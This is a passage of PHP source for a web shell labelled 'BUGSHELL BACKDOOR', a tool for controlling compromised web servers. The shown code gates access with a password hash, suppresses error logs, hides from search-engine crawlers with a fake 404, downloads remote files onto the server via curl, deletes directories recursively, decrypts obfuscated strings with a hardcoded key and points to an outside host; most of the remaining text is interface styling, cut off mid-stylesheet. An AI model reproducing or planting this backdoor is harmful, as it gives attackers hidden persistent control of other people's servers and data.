BUGSHELL BACKDOOR

1. <?php
2. /*! Description & About
3.         * Bugshell V.1
4.         * Responsive Version
5.         * Source Viewer With Syntax Highligting
6.         * Simple Alert
7.         * Without Log's
8.         * Clean Url
9.         * Paralax Cover
10.         * Programmed By Wildan Izzudin
11.         * Web Shell (c) 2017
12.         * Fix On 17, Dec 2017 (Sunday)
13. End !*/
14. error_reporting(0);
15. ob_start("ob_gzhandler");
16. // --- pass : underxploit --- //
17. $pass = "0bdec2f837ad15748be105faaf60db68";
18. $_POST = cl($_POST);
19. $_GET = cl($_GET);
20. $_COOKIE = cl($_COOKIE);
21. $_COEG = array_merge($_POST, $_GET);
22. $_COEG = array_map("xp", $_COEG);
23. $cookie = md5($_SERVER['HTTP_USER_AGENT']);
24. if(!isset($_COOKIE['BUGSHELL'])) {
25. vb('BUGSHELL', $cookie);
26. }
27. function vb($k, $v) {
28.     $_COOKIE[$k] = $v;
29.     setcookie($k, $v);
30. }
31. function mtr($y) {
32.     vars('<meta http-equiv="refresh" content="1;url='.$y.'"/>');
33.     return $y;
34. }
35. function op($d, $e) {
36.     $fp = fopen($d, "w");
37.     $ch = curl_init();
38.           curl_setopt($ch, CURLOPT_URL, $e);
39.           curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
40.           curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
41.           curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
42.           curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
43.           curl_setopt($ch, CURLOPT_FILE, $fp);
44.     return curl_exec($ch);
45.           curl_close($ch);
46.     fclose($fp);
47.     ob_flush();
48.     flush();
49. }
50. function deledir($dirname) {
51.          if (is_dir($dirname))
52.            $dir_handle = opendir($dirname);
53.      if (!$dir_handle)
54.           return false;
55.      while($file = readdir($dir_handle)) {
56.            if ($file != "." && $file != "..") {
57.                 if (!is_dir($dirname."/".$file))
58.                      unlink($dirname."/".$file);
59.                 else
60.                      deledir($dirname.'/'.$file);
61.            }
62.      }
63.      closedir($dir_handle);
64.      rmdir($dirname);
65.      return true;
66. }
67. function a($x17) {
68. @define("x13", "\x31\x33\x33\x37", true);
69. $x14 = base64_decode($x17);
70. $x16s = substr($x14, 0, mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC));
71. $x19 = rtrim(
72.     mcrypt_decrypt(
73.         MCRYPT_RIJNDAEL_128,
74.         hash('sha256', x13, true),
75.         substr($x14, mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC)), MCRYPT_MODE_CBC, $x16s), "\0");
76. return $x19;
77. }
78. function x($b) {
79.     $c = a($b);
80. return $c;
81. }
82. function vars($x) {
83.     echo $x;
84. }
85. @ini_set('error_log',NULL);
86. @ini_set('log_errors',0);
87. @ini_set('html_errors',0);
88. @ini_set('max_execution_time',0);
89. @ini_set('file_uploads',1);
90. @set_time_limit(0);
91. @clearstatcache();
92. @define("x4", "http://underxploit.esy.es/bug/", true);
93. @define("x5", "\x64\x69\x72\x3d", true);
94. @define("x7", "\x63\x6f\x6d\x6d\x61\x6e\x64\x3d", true);
95. @define("x6", "\x66\x69\x6c\x65\x3d", true);
96. @define("x9", "\x3c\x64\x69\x76\x20\x63\x6c\x61\x73\x73\x3d\x27\x63\x6f\x4c\x2d\x6f\x70\x74\x69\x6f\x6e\x20\x74\x6f\x70\x27\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x63\x65\x6e\x74\x65\x72\x3e\x3c\x69\x20\x63\x6c\x61\x73\x73\x3d\x27\x66\x61\x20\x66\x61\x2d\x67\x65\x61\x72\x20\x66\x61\x2d\x33\x78\x20\x66\x61\x2d\x73\x70\x69\x6e\x27\x3e\x3c\x2f\x69\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x5b\x20\x42\x41\x44\x20\x52\x45\x51\x55\x45\x53\x54\x20\x5d\x3c\x2f\x63\x65\x6e\x74\x65\x72\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x2f\x64\x69\x76\x3e", true);
97. @define("sec", $pass, true);
98. if(isset($_COEG['dir'])) {
99.         $dir = str_replace("\\", "/", $_COEG['dir']);
100.         @chdir($dir);
101.     } else {
102.         $dir = str_replace("\\", "/", getcwd());
103. }
104. $dir = str_replace("\\","/", $dir);
105. $scdir = explode("/", $dir);        
106. function cl($arr){
107.     $quotes_sybase = strtolower(ini_get('magic_quotes_sybase'));
108. if(function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc()){
109.         if(is_array($arr)){
110.             foreach($arr as $k=>$v){
111.                 if(is_array($v)) $arr[$k] = cl($v);
112.                 else $arr[$k] = (empty($quotes_sybase) || $quotes_sybase === 'off')? stripslashes($v) : stripslashes(str_replace("\'\'", "\'", $v));
113.             }
114.         }
115.     }
116.     return $arr;
117. }
118. function xp($str){
119.     return (is_array($str))? array_map("rawurldecode", $str):rawurldecode($str);
120. }
121. function r($r) {
122.     vars('<script>window.location = "'.$r.'";</script>');
123.     return $r;
124. }
125. function s($s) {
126.     echo 'notif({
127.                 type: "default",
128.                 msg: "<span class=\'alert\'><font color=\'#fff\'>'.$s.'</font>",
129.                 width: "all",
130.                 height: 100,
131.                 position: "center",
132.             });';
133.     return $s;
134. }
135. function error($text) {
136. echo '<script> notif({
137.                 type: "default",
138.                 msg: "<span class=\'alert\'><font color=\'#fff\'>'.$text.'</font>",
139.                 width: "all",
140.                 height: 100,
141.                 position: "center",
142.             });</script>';
143. return $text;
144. }
145. function success($text) {
146. echo '<script> notif({
147.                 type: "default",
148.                 msg: "<span class=\'alert\'><font color=\'#fff\'>'.$text.'</font>",
149.                 width: "all",
150.                 height: 100,
151.                 position: "center",
152.             });</script>';
153. return $text;
154. }
155. if(get_magic_quotes_gpc()) {
156.     function stripslashes_array($array) {
157.         return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
158. }
159.     $_COEG = stripslashes_array($_COEG);
160.     $_COOKIE = stripslashes_array($_COOKIE);
161. }
162. if(!empty(sec)) {
163.     if(isset($_COEG['pass']) && (md5($_COEG['pass']) == sec))         vb('BUGSHELL', sec);
164. if(!isset($_COOKIE['BUGSHELL']) || ($_COOKIE['BUGSHELL'] != sec))
165.         login();
166. }
167. function login() {
168. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
169.         $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
170.           if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
171.           header('HTTP/1.0 404 Not Found');
172.           exit;
173.      }
174.  } die('<!DOCTYPE html><html><head>
175. <title>LOGIN | BUGSHELL</title> <meta name="robots" content="noindex, nofollow, noarchive"> <meta name="viewport" content="width=device-width, initial-scale=1">
176. <link href="data:image/x-icon;base64,AAABAAEAEBAAAAAAAABoBAAAFgAAACgAAAAQAAAAIAAAAAEAIAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAACFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYX/hYWF/4WFhf+FhYX/hYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYX/hYWFsYWFhbGFhYWxhYWFsYWFhf+FhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWF/4WFhQCFhYX/hYWFsf///4f///+H////h////4eFhYWxhYWF/4WFhQCFhYX/hYWFAIWFhQCFhYUAhYWFAIWFhbGFhYX/hYWF/////4eFhYX/hYWF/4WFhf+FhYX/////h4WFhf+FhYX/hYWFsYWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhf////+H////h////4f///+H////h////4eFhYX/hYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWF/4WFhf+FhYX/////h4WFhf+FhYX/hYWF/4WFhf////+HhYWF/4WFhf+FhYX/hYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWF/////4f///+H////h////4f///+H////h4WFhf+FhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYWxhYWF/4WFhf////+H////h////4f///+H////h////4eFhYX/hYWF/4WFhbGFhYUAhYWFAIWFhQCFhYUAhYWF/4WFhQCFhYX/hYWFsf///4f///+H////h////4eFhYWxhYWF/4WFhQCFhYX/hYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhf+FhYWxhYWFsYWFhbGFhYWxhYWF/4WFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWF/4WFhf+FhYX/hYWF/4WFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUA//8AAP//AAD//wAA/D8AAPgfAADQCwAAwAMAAPAPAADAAwAA8A8AAMADAADQCwAA+B8AAPw/AAD//wAA//8AAA==" rel="icon" type="image/x-icon" /><meta property="og:image" content="https://1.bp.blogspot.com/-BcG4JeX2z6Q/WVYTMixgLvI/AAAAAAAAAmk/PBjmcF02SWgoiP-KcxvWq6QVDV2DACi0QCLcBGAs/s320/PicsArt_06-30-03.52.49.jpg"><meta name="theme-color" content="#222"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-status-bar-style" content="#222"><meta name="msapplication-navbutton-color" content="#222"><meta name="author" content="WILDAN IZZUDIN">
177. <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css"/>
178. <style>
179. @import url("https://fonts.googleapis.com/css?family=Cabin");
180. *{
181.     box-sizing: border-box;
182. }
183. *:focus {
184.    outline: 0;
185. }
186. body {
187.         font-size: 14px;
188.         color:#fff;
189.         margin:auto;
190.         font-family: "Cabin";
191.         background:#191919;
192.        text-shadow:0px 0px 0px #343436;
193. }
194. .btn-exe {
195.     background:#343436;
196.     color:#fff;
197.     font-family: "Cabin";
198.     padding:6px;
199.     border:1px solid #343436;
200.     width:100%;
201.     font-size:13px;
202. }
203. .login-container {
204.     max-width: 450px;
205.     margin: auto;
206.     overflow: auto;
207.    background:none;
208. }
209. .login-kepala {
210.     background:#262624;
211.     padding:10px;
212.     color:#fff;
213.     font-size:17px;
214.     position:fixed;z-index:1024;top:0;left:0;right:0;
215.     box-shadow:0px 0px 3px #111;
216.     font-family: "Cabin";
217. }
218. input[type=password] {
219.     border:1px solid #343436;
220.     padding:8px;
221.     background: #1D1D1D;
222.     color:#fff;
223.     font-family: "Cabin";
224.     width:100%;
225.     font-size:14px;
226. }
227. .btn-exe:hover {
228.     background:none;
229.     border:1px solid #343436;
230.     -webkit-transition: all 0.3s;
231.   -moz-transition: all 0.3s;
232.    transition: all 0.3s;
233. }
234. table {
235.     width: 100%;
236. }
237. @media screen and (max-width: 1024px) {
238. .btn-exe {
239.     background:#343436;
240.     color:#fff;
241.     font-family: "Cabin";
242.     padding:7px;
243.     border:1px solid #343436;
244.     width:100%;
245.     font-size:13px;
246.    }  
247. }
248. @media screen and (max-width: 780px) {
249. .btn-exe {
250.     background:#343436;
251.     color:#fff;
252.     font-family: "Cabin";
253.     padding:7px;
254.     border:1px solid #343436;
255.     width:100%;
256.     font-size:14px;
257.   }
258. }
259. </style>
260. </head><body><div class="login-kepala">
261. <div class="login-container"><form action="" method="post"><table><td align="center" style="width:10%"><i class="fa fa-bug"></i></td><td style="width:70%"><input type="password" name="pass" style="padding:7px"> </td><td style="text-align:right;width:20%"><button type="submit" class="btn-exe"><i class="fa fa-sign-in"></i></button></td></table></form></div></div></body></html>');
262. }
263. ?>
264. <?php
265. vars('<!DOCTYPE HTML>
266. <html lang="id">
267. <head><title>BUGSHELL</title>
268. <link href="data:image/x-icon;base64,AAABAAEAEBAAAAAAAABoBAAAFgAAACgAAAAQAAAAIAAAAAEAIAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAACFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYX/hYWF/4WFhf+FhYX/hYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYX/hYWFsYWFhbGFhYWxhYWFsYWFhf+FhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWF/4WFhQCFhYX/hYWFsf///4f///+H////h////4eFhYWxhYWF/4WFhQCFhYX/hYWFAIWFhQCFhYUAhYWFAIWFhbGFhYX/hYWF/////4eFhYX/hYWF/4WFhf+FhYX/////h4WFhf+FhYX/hYWFsYWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhf////+H////h////4f///+H////h////4eFhYX/hYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWF/4WFhf+FhYX/////h4WFhf+FhYX/hYWF/4WFhf////+HhYWF/4WFhf+FhYX/hYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWF/////4f///+H////h////4f///+H////h4WFhf+FhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYWxhYWF/4WFhf////+H////h////4f///+H////h////4eFhYX/hYWF/4WFhbGFhYUAhYWFAIWFhQCFhYUAhYWF/4WFhQCFhYX/hYWFsf///4f///+H////h////4eFhYWxhYWF/4WFhQCFhYX/hYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhf+FhYWxhYWFsYWFhbGFhYWxhYWF/4WFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWF/4WFhf+FhYX/hYWF/4WFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUAhYWFAIWFhQCFhYUA//8AAP//AAD//wAA/D8AAPgfAADQCwAAwAMAAPAPAADAAwAA8A8AAMADAADQCwAA+B8AAPw/AAD//wAA//8AAA==" rel="icon" type="image/x-icon" />
269. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no">
270. <meta property="og:image" content="/code/img/logo.jpg">
271.     <meta name="theme-color" content="#222">
272.     <meta name="apple-mobile-web-app-capable" content="yes">
273.     <meta name="apple-mobile-web-app-status-bar-style" content="#222">
274.     <meta name="msapplication-navbutton-color" content="#222">
275.     <meta name="author" content="WILDAN IZZUDIN">
276. <style>
277. @import url("https://fonts.googleapis.com/css?family=Cabin");
278. *{
279.     box-sizing: border-box;
280. }
281. *:focus {
282.    outline: 0;
283. }
284. body {
285.         font-size: 14px;
286.         color:#fff;
287.         margin:auto;
288.         font-family: "Cabin";
289.         background:#191919;
290.        text-shadow:0px 0px 0px #343436;
291. }
292. ::selection {
293.    background-color: rgba(201,223,255,0.2);
294.    color: #ffffff;
295. }
296. ::-moz-selection {
297.    background-color: rgba(201,223,255,0.1);
298.    color: #ffffff;
299. }
300. hr {
301.     border: 0;
302.     height: 1px;
303.     background-image: -webkit-linear-gradient(left, #343436, #343436, #343436);
304.     background-image: -moz-linear-gradient(left, #343436, #343436, #343436);
305.     background-image: -ms-linear-gradient(left, #343436, #343436, #343436);
306.     background-image: -o-linear-gradient(left, #343436, #343436, #343436);
307. }
308. code {
309.     font-family: "Cabin";
310.     word-wrap: break-word;
311.     background:none;
312. }
313. pre {
314.     margin:0px;
315.     border:1px solid #343436;
316.     white-space: pre-wrap;
317.    white-space: -moz-pre-wrap;
318.    white-space: -pre-wrap;
319.    white-space: -o-pre-wrap;
320.    word-wrap: break-word;  
321. }
322. .co {
323.    margin:auto;
324.    max-width:300px;
325. }
326. .a:hover {
327.     color:#1D9D73;
328.     -webkit-transition: all 0.3s;
329.   -moz-transition: all 0.3s;
330.    transition: all 0.3s;
331. }
332. .mainc {
333.     color: #1D9D73;
334. }
335. .coL-option {
336.     padding:5px;
337.     border:1px solid #343436;
338.     margin-top:5px;
339.     background:none;
340. }
341. .coL-btn-option-active {
342.     padding:5px;
343.     background: #343436;
344.     border:1px solid #343436;
345.     font-size:16px;
346.     font-family: "Cabin";
347.     width:100%;
348.     color:#fff;
349. }
350. .coL-btn-option {
351.     padding:5px;
352.     background: none;
353.     border:1px solid #343436;
354.     font-size:16px;
355.     font-family: "Cabin";
356.     width:100%;
357.     color:#fff;
358. }
359. .coL-btn-option:hover {
360.     background: #343436;
361.     width:100%;
362.     -webkit-transition: all 0.3s;
363.   -moz-transition: all 0.3s;
364.    transition: all 0.3s;
365. }
366. .coL-option-panel {
367.     padding:5px;
368.     border:none;
369.     background:#343436;
370. }
371. th {
372.     font-weight: normal;
373.     font-size: 15px;
374. }
375. .btn-exe {
376.     background:#343436;
377.     color:#fff;
378.     font-family: "Cabin";
379.     padding:6px;
380.     border:1px solid #343436;
381.     width:100%;
382.     font-size:13px;
383. }
384. textarea {
385.     border: 1px solid #343436;
386.     width: 100%;
387.     height: 487px;
388.     padding: 5px;
389.     background: #1D1D1D;
390.     color: #ffffff;
391.     font-family: "Cabin";
392.    font-size: 13px;
393. }
394. select {
395.    cursor:pointer;
396.     padding:6px;
397.     border:1px solid #343436;
398.     font-family: "Cabin";
399.     font-size:14px;
400.     background: #1D1D1D;
401.     width:100%;
402.    color: #fff;
403.    -webkit-transition: all 0.5s;
404.    -moz-transition: all 0.5s;
405.     transition: all 0.5s;
406. }
407. .php {
408.     font-size: 13px;
409. }
410. .td-md5 {
411.     border-right:1px solid #1D9D73;
412.     padding:6px;
413. }
414. .login-container {
415.     max-width: 450px;
416.     margin: auto;
417.     overflow: hidden;
418.    background:none;
419. }
420. .login-kepala {
421.     background:#262624;
422.     padding:10px;
423.     color:#fff;
424.     font-size:17px;
425.     position:fixed;z-index:1024;top:0;left:0;right:0;
426.     box-shadow:0px 0px 3px #111;
427.     font-family: "Cabin";
428. }
429. .dir {
430.     background:#1D1D1D;
431.     padding:2px;
432.     margin-left:2px;
433.     margin-right:2px;
434.     margin-top:3px;
435.     margin-bottom:1px;
436. }
437. .dir-pallet {
438.     background:#343436;
439.     padding:6px;
440.     text-align:left;
441. }
442. .dir-td-left {
443.     width:50px;
444.     border-right:1px solid #1D9D73;
445.     font-size: 14px;
446. }
447. .dir-td-right {
448.     padding-left:5px;
449.     font-size: 15px;
450. }
451. .tools-content {
452.     padding:3px;
453.     margin-top:5px;
454.     background:none;
455.     border:1px solid #343436;
456. }
457. .td-tools-left {
458.     padding:7px;
459.     width:30px;
460.     text-align:center;
461. }
462. .td-tools-icon {
463.     width:50px;
464.     background:none;
465.     text-align:center;
466. }
467. .td-tools-content {
468.     padding-left:5px;
469. }
470. .ex-hov:hover {
471.     background:rgba(52, 52, 54, 0.3);
472.     -webkit-transition: all 0.3s;
473.   -moz-transition: all 0.3s;
474.    transition: all 0.3s;
475. }
476. .kepala {
477.     background:#343436;
478.     padding:7px;
479.     color:#fff;
480.     font-size:15px;
481.     position:fixed;z-index:1024;top:0;left:0;right:0;
482.     box-shadow:0px 0px 3px #111;
483.     font-family: "Cabin";
484. }
485. .co-ontainer {
486.     max-width: 820px;
487.     margin: auto;
488.     overflow: hidden;
489.    background:none;
490. }
491. .co-ontainer-2 {
492.     max-width: 820px;
493.     margin: auto;
494.     overflow: hidden;
495.    background:#232326;
496.    margin-top:50px;
497. }
498. table {
499.     width:100%;
500. }
501. .td-panel {
502.     background: #343436;
503.     padding:5px;
504.     width:40px;
505.     text-align:center;
506. }
507. .td-panel-right {
508.     padding-left:3px;
509.     font-size: 14px;
510. }
511. .wrap {
512.     word-wrap: break-word;  
513. }
514. .break {
515.     word-break: break-all;
516.    white-space: normal;
517. }
518. .btn-dark:hover {
519.     color:#4B81AA;
520.     }
521. .coL-panel {
522.     padding:1px;
523.     border:1px solid #343436;
524.     color:#fff;
525.     background:none;
526. }
527. .coR-panel {
528.     padding:1px;
529.     border:1px solid #343436;
530.     color:#fff;
531.     background:none;
532. }
533. .footer {
534.     background:#343436;
535.     color:#fff;
536.     padding:8px;
537.     text-align:center;
538.     margin-top:2px;
539. }
540. .btn-nav {
541.    background:rgba(0,0,0,0.3);
542.    padding:6px;
543.    color:#fff;
544.     font-size:14px;
545.     font-family: "Cabin";
546.     width:100%;
547.     border:none;
548.     font-weight:normal;
549. }
550. .btn-nav:hover {
551.     background:#343436;
552.     -webkit-transition: all 0.3s;
553.   -moz-transition: all 0.3s;
554.    transition: all 0.3s;
555. }
556. .table-info {
557.     margin-top:3px;
558.     border-collapse:collapse;
559.     font-family: "Cabin";
560. }
561. .th-info {
562.     padding:6px;
563.     border:1px solid #343436;
564.     background:#343436;
565.     border-collapse:collapse;
566.     font-family: "Cabin";
567. }
568. .td-info {
569.     padding:7px;
570.     border:1px solid #343436;
571.     background:none;
572.     border-collapse:collapse;
573.     font-family: "Cabin";
574. }
575. .table-file {
576.     margin-top:3px;
577.     border-collapse:collapse;
578.     font-family: "Cabin";
579. }
580. .th-file {
581.     padding:6px;
582.     border:1px solid #343436;
583.     background:#343436;
584.     border-collapse:collapse;
585.     font-family: "Cabin";
586. }
587. .td-file {
588.     padding:4px;
589.     border:1px solid #343436;
590.     background:none;
591.     border-collapse:collapse;
592.     font-family: "Cabin";
593. }
594. .label-danger {
595.     color:#FF0000;
596. }
597. .label-default {
598.     color:#1D9D73;
599. }
600. .label-success {
601.     color:#1D9D73;
602. }
603. .top {
604.     margin-top:5px;
605. }
606. input[type=text] {
607.     border:1px solid #343436;
608.     padding:7px;
609.     background: #1D1D1D;
610.     color:#fff;
611.     font-family: "Cabin";
612.     width:100%;
613.     font-size:14px;
614. }
615. input[type=password] {
616.     border:1px solid #343436;
617.     padding:8px;
618.     background: #1D1D1D;
619.     color:#fff;
620.     font-family: "Cabin";
621.     width:100%;
622.     font-size:14px;
623. }
624. input[type=file] {
625.     border:1px solid #343436;
626.     color:trasparent;
627.     background: #1D1D1D;
628.     width:100%;
629.     font-size:12px;
630.     padding:4px;
631.     font-family: "Cabin";
632. }
633. .alert {
634.     font-family: "Cabin";
635. }
636. .btn-exe:hover {
637.     background:none;
638.     border:1px solid #343436;
639.     -webkit-transition: all 0.3s;
640.   -moz-transition: all 0.3s;
641.    transition: all 0.3s;
642. }
643. .nav {
644.     background: #303030;
645.     color:#fff;
646.     width:30px;
647.     height:30px;
648.     padding:5px;
649.     border:none;
650.     border-radius:100%;
651.     box-shadow: 2px 2px 2px rgba(0,0,0,0.3) inset;
652. }
653. .nav:hover {
654.   background: #1D9D73;
655.  transition: all 0.5s ease-in-out;
656.  color: #fff;
657. }
658. /* Main */
659. .cover {
660.     background:url(\'https://3.bp.blogspot.com/-ypxBvzFNdSg/WjXR2E-mUZI/AAAAAAAAAvo/bXIHf3enhBck-rd1NoYhAgnJPqOZhljRgCLcBGAs/s1600/cov.jpg\') fixed;
661.     background-size:100% 125%;
662.     padding-top:250px;
663.     padding-bottom:5px;
664.     padding-left:5px;
665.     padding-right:5px;
666.     border:0px solid #1D1D1D;
667. }
668.     .coL {
669.         width: 469px;
670.         border: 0px solid #343436;
671.         background: #1D1D1D;
672.         padding: 5px;
673.         float: left;
674.        margin-left:2px;
675.         margin-right:2px;
676.         margin-bottom:2px;
677.         margin-top:3px;
678.        color:white;
679.     }
680.     .coR {
681.         width: 343px;
682.         border: 0px solid #343436;
683.         background: #1D1D1D;
684.         margin-left:2px;
685.         margin-right:2px;
686.         margin-bottom:2px;
687.         margin-top:3px;
688.        padding: 5px;
689.         float: left;
690.     }
691. a {
692.     text-decoration:none;
693.     color:#fff;
694. }
695. .cookie-td {
696.     width: 150px;
697. }
698. /* Design By Wildan Izzudin */
699. @media screen and (max-width: 1024px) {
700.    
701.     .co-ontainer-2 {
702.         width: 100%;
703.     }
704.     .coL {
705.         width: 467px;
706.         background: none:
707.        border: none;
708.        margin-bottom:3px;
709.     }
710.     .coR {
711.         width: 42%;
712.         float: right;
713.     }
714.     .cookie-td {
715.         width: 150px;
716.     }
717.    .btn-exe {
718.     background:#343436;
719.     color:#fff;
720.     font-family: "Cabin";
721.     padding:7px;
722.     border:1px solid #343436;
723.     width:100%;
724.     font-size:13px;
725.    }  
726.    input[type=file] {
727.        border:1px solid #343436;
728.        color:trasparent;
729.        background: #1D1D1D;
730.        width:100%;
731.        font-size:12px;
732.        padding:4px;
733.        font-family: "Cabin";
734.    }
735. }
736. @media screen and (max-width: 780px) {
737.    
738.     .header,
739.     .cover {
740.     background:url(\'https://3.bp.blogspot.com/-ypxBvzFNdSg/WjXR2E-mUZI/AAAAAAAAAvo/bXIHf3enhBck-rd1NoYhAgnJPqOZhljRgCLcBGAs/s1600/cov.jpg\');
741.     background-size:100% 100%;
742.     padding-top:160px;
743.     padding-bottom:5px;
744.     padding-left:5px;
745.     padding-right:5px;
746.     margin:3px;
747. }
748.     .coL {
749.         width: auto;
750.         float: none;
751.     }
752.     .coR {
753.         width: auto;
754.         float: none;
755.     }
756.     .cookie-td {
757.         width: 100px;
758.     }
759.    .btn-exe {
760.     background:#343436;
761.     color:#fff;
762.     font-family: "Cabin";
763.     padding:7px;
764.     border:1px solid #343436;
765.     width:100%;
766.     font-size:14px;
767.   }
768.   input[type=file] {
769.     border:1px solid #343436;
770.     color:trasparent;
771.     background: #1D1D1D;
772.     width:100%;
773.     font-size:12px;
774.     padding:6px;
775.     font-family: "Cabin";
776. }
777. }
778.     .hljs{display:block;overflow-x:auto;padding:0.5em;background:#1D1D1D;color:#e6e1dc}
779.     .hljs-comment,.hljs-quote{color:#bc9458;font-style:italic}
780.     .hljs-keyword,.hljs-selector-tag{color:#c26230}
781.     .hljs-string,.hljs-number,.hljs-regexp,.hljs-variable,.hljs-template-variable{color:#a5c261}
782.     .hljs-subst{color:#519f50}.hljs-tag,.hljs-name{color:#e8bf6a}
783.     .hljs-type{color:#da4939}
784.     .hljs-symbol,.hljs-bullet,.hljs-built_in,.hljs-builtin-name,.hljs-attr,.hljs-link{color:#6d9cbe}
785.     .hljs-params{color:#d0d0ff}
786.     .hljs-attribute{color:#cda869}
787.     .hljs-meta{color:#9b859d}
788.     .hljs-title,.hljs-section{color:#ffc66d}
789.     .hljs-addition{background-color:#144212;color:#e6e1dc;display:inline-block;width:100%}
790.     .hljs-deletion{background-color:#600;color:#e6e1dc;display:inline-block;width:100%}
791.     .hljs-selector-class{color:#9b703f}
792.     .hljs-selector-id{color:#8b98ab}
793.     .hljs-emphasis{font-style:italic}
794.     .hljs-strong{font-weight:bold}
795.     .hljs-link{text-decoration:underline}
796.     #ui_notifIt{
797.         position: fixed;
798.         top: 10px;
799.         right: 10px;
800.         left:10px;
801.         cursor: pointer;
802.         overflow: hidden;
803.         -webkit-box-shadow: 0px 3px 5px rgba(0, 0, 0, 0.3);
804.         -moz-box-shadow: 0px 3px 5px rgba(0, 0, 0, 0.3);
805.         -o-box-shadow: 0px 3px 5px rgba(0, 0, 0, 0.3);
806.         box-shadow: 0px 3px 5px rgba(0, 0, 0, 0.3);
807.         -wekbit-border-radius: 5px;
808.         -moz-border-radius: 5px;
809.         -o-border-radius: 5px;
810.         border-radius: 5px;
811.         z-index: 2000;
812.     }
813.     #ui_notifIt:hover{
814.         opacity: 1 !important;
815.     }
816.     #ui_notifIt p{
817.         text-align: center;
818.         font-family: sans-serif;
819.         font-size: 14px;
820.         padding: 0;
821.         margin: 0;
822.     }
823.     #notifIt_close{
824.         position: absolute;
825.         color: #FFF;
826.         top: 0;
827.         padding: 0px 5px;
828.         right: 0;
829.     }
830.     #notifIt_close:hover {
831.         background-color: rgba(255, 255, 255, 0.3);
832.     }  
833.     #ui_notifIt.default{
834.         background: #242424;
835.         border:0px solid #091835;
836.         box-shadow:0px 2px 4px rgba(0,0,0,0.4);
837.     }
838.    
839.     /* notifit confirm */
840.     .notifit_confirm_bg,
841.     .notifit_prompt_bg{
842.         position: fixed;
843.         top: 0;
844.         left: 0;
845.         height: 100%;
846.         width: 100%;
847.         background-color: rgba(255, 255, 255, 0.1);
848.     }
849.     .notifit_confirm *,
850.     .notifit_prompt *{
851.         font-family: sans-serif;
852.     }
853.     .notifit_confirm,
854.     .notifit_prompt{
855.         position: fixed;
856.         top: 0;
857.         left: 0;
858.         padding: 30px 30px 0px 30px;
859.         background-color: #eee;
860.         border: 1px solid rgba(0, 0, 0, 0.1);
